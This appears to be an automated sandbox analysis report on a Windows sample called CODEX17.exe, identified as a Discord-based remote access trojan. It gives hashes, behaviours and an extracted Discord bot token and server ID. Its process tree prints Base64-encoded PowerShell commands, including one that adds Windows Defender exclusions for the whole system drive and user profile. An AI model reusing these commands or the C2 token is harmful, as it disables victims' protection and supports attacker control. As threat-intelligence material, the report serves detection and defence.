Analysis
-
max time kernel
94s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2024 14:17
Static task
static1
Behavioral task
behavioral1
Sample
CODEX17.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
CODEX17.exe
Resource
win10v2004-20241007-en
General
-
Target
CODEX17.exe
-
Size
307KB
-
MD5
53cc7337eed07bbbe0172f0b64bc6245
-
SHA1
9b0ac7e0eaffdb6ed8af1501939f40bd798f6be0
-
SHA256
1e5a4524dab6f1e4125043a7cdcfb6874c32a0514941ec4a90211f53efeef058
-
SHA512
ff2ec069d7877fdc646dfaaba4d9525ef71c04c93936accdd1bc1bfe9ab873ab27cceb9c2d34d25f3b3e6d4e6bb4ece707b797d2f5672d73583e21a361fb333d
-
SSDEEP
6144:m2EUicOFEG3AFDmDbpM6/XETGNNjyhRJNJC32XENQ8NvN:m2rOXTfpNg+
Malware Config
Extracted
discordrat
-
discord_token
MTMwODQxMjQ0MjIyODk1MzIwMA.GV9W16.iYVXo71VO-dFm-6aOmZjrpuYUGqFHWVGtkvM5Q
-
server_id
1316071968298111026
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation CODEX17.exe -
Executes dropped EXE 1 IoCs
pid Process 3172 Client-built.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 50 discord.com 51 discord.com 17 discord.com 21 discord.com 31 discord.com 32 discord.com 48 discord.com 49 discord.com 52 discord.com 16 discord.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CODEX17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5092 powershell.exe 5092 powershell.exe 2184 powershell.exe 2184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 3172 Client-built.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1952 wrote to memory of 5092 1952 CODEX17.exe 82 PID 1952 wrote to memory of 5092 1952 CODEX17.exe 82 PID 1952 wrote to memory of 5092 1952 CODEX17.exe 82 PID 1952 wrote to memory of 2184 1952 CODEX17.exe 84 PID 1952 wrote to memory of 2184 1952 CODEX17.exe 84 PID 1952 wrote to memory of 2184 1952 CODEX17.exe 84 PID 1952 wrote to memory of 3172 1952 CODEX17.exe 86 PID 1952 wrote to memory of 3172 1952 CODEX17.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAaABoAG4AIwA+AA=="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQB0ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54cc9e7069534f7bcbb90ad7cac69ed78
SHA1a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892
SHA2564814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c
SHA512e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653
-
Filesize
18KB
MD522ea3ecd0974535cdcb8b2f42fefe59f
SHA1738ec23683b3bf466f06f3e78945716231bdc681
SHA256d413e7fcc19ab3b13aae3c278d186b8312696506ee09f70dd57d2e18fe4542bd
SHA5124b502884e8dfb72804bf99f92d154995daeea505b429ba04cfa1e0cef8bee6b741448936aac3c22d82dd85d500612da71f54e3a4a50d0ccdd0d0ea6d937bb93c
-
Filesize
78KB
MD5eef37e61081aca867be51dab8d02c732
SHA1b58736f3eb07dedd144e61a8e38802de1c15b947
SHA256d74aed2a699c0ad2be01c761918ddcd5486bcf331a0a54a02bed4e073bdb39a8
SHA51208555aeb12b54264370e1e4154a7509efe21b84fbe5aa1fd4c322b22886a149adeaa3ff7e9b1b54f9c1ccd1dcc9ae32e5702c876b9ed1b58f63a9a1c61425078
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82